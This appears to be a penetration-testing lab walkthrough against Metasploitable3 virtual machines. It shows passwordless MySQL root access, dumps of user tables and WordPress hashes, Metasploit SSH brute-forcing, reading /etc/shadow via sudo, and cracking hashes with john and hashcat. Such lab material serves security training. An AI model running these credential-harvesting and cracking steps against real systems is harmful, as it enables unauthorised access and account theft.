+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin | currentLogin | registrationDate | challenge | pass_due | hash | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| 1 | | admin | admin | NULL | NULL | 1271712540 | 1271712540 | NULL | NULL | NULL | f6fdffe48c908deb0f4c3bd36c032e72 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.023 sec)
MySQL [tikiwiki195]> exit
Bye
msf6 auxiliary(scanner/mysql/mysql_login) > exitWindows Server 2008
As shown in the Gaining Access section, the Windows 2008 Server has a vulnerability when accessing the MySQL service. Enter the service as root and see what databases are hosted on the machine. To gather credentials to gain persistant access, check all the databases and their tables, focusing on the tables that might have user credential information.
msf6 auxiliary(scanner/mysql/mysql_login) > mysql -u root -h 192.168.56.105
[*] exec: mysql -u root -h 192.168.56.105
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.5.20-log MySQL Community Server (GPL)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cards |
| mysql |
| performance_schema |
| test |
| wordpress |
+--------------------+
6 rows in set (0.031 sec)
MySQL [(none)]> use information_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [information_schema]> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
| INNODB_CMP_RESET |
| INNODB_TRX |
| INNODB_CMPMEM_RESET |
| INNODB_LOCK_WAITS |
| INNODB_CMPMEM |
| INNODB_CMP |
| INNODB_LOCKS |
+---------------------------------------+
37 rows in set (0.002 sec)
MySQL [information_schema]> show cards;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cards' at line 1
MySQL [information_schema]> use cards;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [cards]> show tables;
+-----------------+
| Tables_in_cards |
+-----------------+
| queen_of_hearts |
+-----------------+
1 row in set (0.002 sec)
MySQL [cards]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
24 rows in set (0.002 sec)
MySQL [mysql]> select * from user;
+-----------+------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string |
+-----------+------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| localhost | root | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| 127.0.0.1 | root | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| ::1 | root | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| localhost | | | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | NULL |
| % | root | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | NULL |
+-----------+------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
5 rows in set (0.009 sec)
MySQL [mysql]> use test;
Database changed
MySQL [test]> show tables;
Empty set (0.001 sec)
MySQL [test]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [wordpress]> show tables;
+---------------------------+
| Tables_in_wordpress |
+---------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_nf_objectmeta |
| wp_nf_objects |
| wp_nf_relationships |
| wp_ninja_forms_fav_fields |
| wp_ninja_forms_fields |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------+
17 rows in set (0.002 sec)
MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 | admin | admin@example.com | | 2016-09-26 22:28:12 | | 0 | admin |
| 2 | vagrant | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ | vagrant | vagrant@example.com | | 2016-09-27 20:13:37 | | 0 | vagrant |
| 3 | user | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ | user | user@example.com | | 2016-09-27 20:14:08 | | 0 | user |
| 4 | manager | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 | manager | manager@example.com | | 2016-09-27 20:15:14 | | 0 | manager |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
4 rows in set (0.001 sec)
MySQL [wordpress]> exit
ByeFocus on that last table with credentials.
Those are from a website running on the machine, explicitly, a Wordpress site, as the database is named "Wordpress" and all the tables within begin with a wp, standing for Wordpress. Assuming that the credentials within the table wp_users might also be part of the OS and are used to using the same password for their local account and the accounts for the website, try cracking the passwords using hashcat , although a similar tool like John The Ripper can also be used.
Cracking the passwords only uncovered two of the hashed values taken from the database after a certain amount of time. However, launching the attack with a list of different users and passwords can be used to try all the different combinations using an auxiliary module from Metasploit, setting a couple of variables from the module options. Thus, accessing with the two uncovered passwords, as well as extra values for the combinations.
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE pass.txt
PASS_FILE => pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE usernames.txt
USER_FILE => usernames.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.105
RHOSTS => 192.168.56.105
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.56.105:22 - Starting bruteforce
[+] 192.168.56.105:22 - Success: 'vagrant:vagrant' 'Microsoft Windows Server 2008 R2 Standard 6.1.7601 Service Pack 1 Build 7601'
[+] 192.168.56.105:22 - Success: 'Administrator:vagrant' 'Microsoft Windows Server 2008 R2 Standard 6.1.7601 Service Pack 1 Build 7601'
[*] Command shell session 2 opened (10.0.3.15:44343 -> 192.168.56.105:22) at 2021-09-16 15:56:26 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell windows SSH vagrant:vagrant (192.168.56.105:22) 10.0.3.15:38863 -> 192.168.56.105:22 (192.168.56.105)
2 shell windows SSH Administrator:vagrant (192.168.56.105:22) 10.0.3.15:44343 -> 192.168.56.105:22 (192.168.56.105)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
ls
AppData
Application Data
Contacts
Cookies
Desktop
Documents
Downloads
Favorites
Links
Local Settings
Music
My Documents
NTUSER.DAT
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
NetHood
Pictures
PrintHood
Recent
Saved Games
Searches
SendTo
Start Menu
Templates
Videos
config.yml
ntuser.dat.LOG1
ntuser.dat.LOG2
ntuser.ini
whoami
vagrant-2008r2\vagrant
systeminfo
Host Name: VAGRANT-2008R2
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner:
Registered Organization: Vagrant Inc.
Product ID: 00477-001-0000347-84598
Original Install Date: 8/30/2021, 8:30:25 AM
System Boot Time: 9/16/2021, 12:46:57 PM
System Manufacturer: innotek GmbH
System Model: VirtualBox
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 60 Stepping 3 GenuineIntel ~3395 Mhz
BIOS Version: innotek GmbH VirtualBox, 12/1/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,048 MB
Available Physical Memory: 334 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 1,094 MB
Virtual Memory: In Use: 3,001 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB3134760
[02]: KB976902
Network Card(s): 2 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Desktop Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.56.100
IP address(es)
[01]: 192.168.56.105
[02]: fe80::f466:f625:3311:1aee
[02]: Intel(R) PRO/1000 MT Desktop Adapter
Connection Name: Local Area Connection 2
DHCP Enabled: Yes
DHCP Server: 255.255.255.255
IP address(es)
[01]: 169.254.253.55
[02]: fe80::d883:3723:3d55:fd37
net users
User accounts for \\VAGRANT-2008R2
-------------------------------------------------------------------------------
Administrator anakin_skywalker artoo_detoo
ben_kenobi boba_fett c_three_pio
chewbacca darth_vader greedo
Guest han_solo jabba_hutt
jarjar_binks kylo_ren lando_calrissian
leia_organa luke_skywalker sshd
sshd_server vagrant
The command completed successfully.
net user sshd
User name sshd
Full Name sshd privsep
Comment
User's comment
Country code 000 (System Default)
Account active No
Account expires Never
Password last set 8/30/2021 8:37:02 AM
Password expires Never
Password changeable 8/30/2021 8:37:02 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory C:\Program Files\OpenSSH\var\empty
Last logon Never
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
net user vagrant
User name vagrant
Full Name vagrant
Comment Vagrant User
User's comment
Country code 001 (United States)
Account active Yes
Account expires Never
Password last set 8/30/2021 8:30:14 AM
Password expires Never
Password changeable 8/30/2021 8:30:14 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/16/2021 12:55:49 PM
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
net user Administrator
User name Administrator
Full Name
Comment Built-in account for administering the computer/domain
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/30/2021 8:30:14 AM
Password expires Never
Password changeable 8/30/2021 8:30:14 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/16/2021 12:57:07 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
exit
[*] 192.168.56.105 - Command shell session 1 closed. Reason: User exitLinux 14.04
Having found a variety of users during the gaining access section, testing out simple credentials using the ssh_login auxiliary opens a privilege command shell as part of the sudo group. This will allow us to read the encrypted passwords of all the users, which can be unencrypted to assure persistent access to the machine.
msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD vagrant
PASSWORD => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME vagrant
USERNAME => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.106
RHOSTS => 192.168.56.106
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.56.106:22 - Starting bruteforce
[+] 192.168.56.106:22 - Success: 'vagrant:vagrant' 'uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 3 opened (192.168.56.104:37163 -> 192.168.56.106:22) at 2021-09-18 04:06:52 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 shell linux SSH vagrant:vagrant (192.168.56.106:22) 192.168.56.104:37163 -> 192.168.56.106:22 (192.168.56.106)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 3
[*] Starting interaction with 3...
whoami
vagrant
id
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
hostname
metasploitable3-ub1404
cat /etc/shadow
cat: /etc/shadow: Permission denied
sudo cat /etc/shadow
root:!:18564:0:99999:7:::
daemon:*:16176:0:99999:7:::
bin:*:16176:0:99999:7:::
sys:*:16176:0:99999:7:::
sync:*:16176:0:99999:7:::
games:*:16176:0:99999:7:::
man:*:16176:0:99999:7:::
lp:*:16176:0:99999:7:::
mail:*:16176:0:99999:7:::
news:*:16176:0:99999:7:::
uucp:*:16176:0:99999:7:::
proxy:*:16176:0:99999:7:::
www-data:*:16176:0:99999:7:::
backup:*:16176:0:99999:7:::
list:*:16176:0:99999:7:::
irc:*:16176:0:99999:7:::
gnats:*:16176:0:99999:7:::
nobody:*:16176:0:99999:7:::
libuuid:!:16176:0:99999:7:::
syslog:*:16176:0:99999:7:::
messagebus:*:18564:0:99999:7:::
sshd:*:18564:0:99999:7:::
statd:*:18564:0:99999:7:::
vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:18564:0:99999:7:::
dirmngr:*:18564:0:99999:7:::
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:18564:0:99999:7:::
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:18564:0:99999:7:::
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:18564:0:99999:7:::
artoo_detoo:$1$tfvzyRnv$mawnXAR4GgABt8rtn7Dfv.:18564:0:99999:7:::
c_three_pio:$1$lXx7tKuo$xuM4AxkByTUD78BaJdYdG.:18564:0:99999:7:::
ben_kenobi:$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:18564:0:99999:7:::
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.:18564:0:99999:7:::
anakin_skywalker:$1$jlpeszLc$PW4IPiuLTwiSH5YaTlRaB0:18564:0:99999:7:::
jarjar_binks:$1$SNokFi0c$F.SvjZQjYRSuoBuobRWMh1:18564:0:99999:7:::
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0:18564:0:99999:7:::
boba_fett:$1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0:18564:0:99999:7:::
jabba_hutt:$1$9rpNcs3v$//v2ltj5MYhfUOHYVAzjD/:18564:0:99999:7:::
greedo:$1$vOU.f3Tj$tsgBZJbBS4JwtchsRUW0a1:18564:0:99999:7:::
chewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.:18564:0:99999:7:::
kylo_ren:$1$rpvxsssI$hOBC/qL92d0GgmD/uSELx.:18564:0:99999:7:::
mysql:!:18564:0:99999:7:::
avahi:*:18564:0:99999:7:::
colord:*:18564:0:99999:7:::
vboxadd:!:18880::::::
^C
Abort session 3? [y/N] y
[*] 192.168.56.106 - Command shell session 3 closed. Reason: User exit
msf6 auxiliary(scanner/ssh/ssh_login) >A good idea now is to crack the passwords of all the users that are part of the sudo group. However, there is one of those user accounts that we have the crendentials for, so that could be an extra measure to assure continuous access to the machine, despite already having superuser access to it.
The first step is to take both the /etc/shadow and the /etc/passwd files and execute the following command.
unshadow passwd shadow > credentialsThis will turn the shadow file into a normal unix password file.
Note: unshadow is one of the utilities from John the Ripper.
Looking at the names of the users, perhaps the common known lists with user credentials are not the most optimal for them. What about creating a list of words and sentences from Star Wars?
Now, use john or hashcat to decrypt the passwords using a wordlist. A first test allows us to decrypt the same password already gained.
john --single credentials
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt"
Use the "--format=md5crypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
vagrant (vagrant)
1g 0:00:00:00 DONE (2021-10-08 04:18) 50.00g/s 200.0p/s 200.0c/s 200.0C/s vagrant..vagra
Use the "--show" option to display all of the cracked passwords reliably
Session completedLaunch john or hashcat with the lists. Are any of the passwords cracked?
john credentials --wordlist=star_wars.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nerf_herder (?)
help_me_obiwan (?)
Warning: Only 42 candidates left, minimum 48 needed for performance.
2g 0:00:00:00 DONE (2021-10-08 07:13) 22.22g/s 6866p/s 93533c/s 93533C/s gRrrr0wr:..cHew!e;
Use the "--show" option to display all of the cracked passwords reliably
Session completedThere's two passwords cracked! The issue now will be to know to which user they belong to. As the first list was created by taking words the characters have said in the movies, the best bet is to try out these two passwords with Leia, the character that first said those!
Another option though, is to check the john.pot file, where cracked passwords are stored.
$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:nerf_herder
$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:help_me_obiwanComparing the encrypted passwords in the /etc/shadow file gives us the following;
<omitted>
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:1111:100::/home/leia_organa:/bin/bash
<omitted>
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:1113:100::/home/han_solo:/bin/bash
<omitted>Therefrom, the credentials:
leia_organa - help_me_obiwan
han_solo - nerf_herder
Alternatively, use the following to simply look at the cracked passwords from the file.
john --show credentials
leia_organa:help_me_obiwan:1111:100::/home/leia_organa:/bin/bash
han_solo:nerf_herder:1113:100::/home/han_solo:/bin/bashUsing hashcat, with the same list gives us another cracked password.
hashcat -m 500 credentials star_wars.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 9 4900HS with Radeon Graphics, 2884/2948 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 15 digests; 15 unique digests, 15 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
INFO: Removed 2 hashes found in potfile.
Host memory required for this attack: 64 MB
Dictionary cache built:
* Filename..: star_wars.txt
* Passwords.: 53
* Bytes.....: 712
* Keyspace..: 53
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:like_my_father_beforeme
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: credentials
Time.Started.....: Fri Oct 8 08:01:34 2021 (0 secs)
Time.Estimated...: Fri Oct 8 08:01:34 2021 (0 secs)
Guess.Base.......: File (star_wars.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 6494 H/s (7.09ms) @ Accel:64 Loops:1000 Thr:1 Vec:8
Recovered........: 3/15 (20.00%) Digests, 3/15 (20.00%) Salts
Progress.........: 795/795 (100.00%)
Rejected.........: 0/795 (0.00%)
Restore.Point....: 53/53 (100.00%)
Restore.Sub.#1...: Salt:14 Amplifier:0-1 Iteration:0-1000
Candidates.#1....: help_me_obiwan -> chewie
Started: Fri Oct 8 08:01:33 2021
Stopped: Fri Oct 8 08:01:36 2021Again, looking into the /etc/shadow file, find the username belonging to that encrypted password.
<omitted>
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:1112:100::/home/luke_skywalker:/bin/bash
<omitted>Therefrom, the credentials:
luke_skywalker - like_my_father_beforeme
To continue, more lists should be written from the first list. Create another list with mentalist as follows as an example.
Launch hashcat or john with the new list!
Using hashcat gives us the following:
hashcat -m 500 credentials star_wars3.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 9 4900HS with Radeon Graphics, 2884/2948 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 15 digests; 15 unique digests, 15 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
INFO: Removed 3 hashes found in potfile.
Host memory required for this attack: 64 MB
Dictionary cache built:
* Filename..: star_wars3.txt
* Passwords.: 216
* Bytes.....: 2949
* Keyspace..: 216
* Runtime...: 0 secs
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:thats_no_m00n
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: credentials
Time.Started.....: Fri Oct 8 08:35:16 2021 (0 secs)
Time.Estimated...: Fri Oct 8 08:35:16 2021 (0 secs)
Guess.Base.......: File (star_wars3.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 7929 H/s (6.60ms) @ Accel:256 Loops:250 Thr:1 Vec:8
Recovered........: 4/15 (26.67%) Digests, 4/15 (26.67%) Salts
Progress.........: 3240/3240 (100.00%)
Rejected.........: 0/3240 (0.00%)
Restore.Point....: 216/216 (100.00%)
Restore.Sub.#1...: Salt:14 Amplifier:0-1 Iteration:750-1000
Candidates.#1....: help_m3_obiwan -> ch3wie
Started: Fri Oct 8 08:35:15 2021
Stopped: Fri Oct 8 08:35:18 202Once again, looking into the /etc/shadow file, find the username belonging to that encrypted password.
<omitted>
ben_kenobi:$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:18564:0:99999:7:::
<omitted>Therefrom, the credentials:
ben_kenobi - thats_no_m00n
john --format=md5crypt root4john --wordlist=star_wars3.txt
Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Remaining 13 password hashes with 13 different salts
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thats_no_m00n (ben_kenobi)
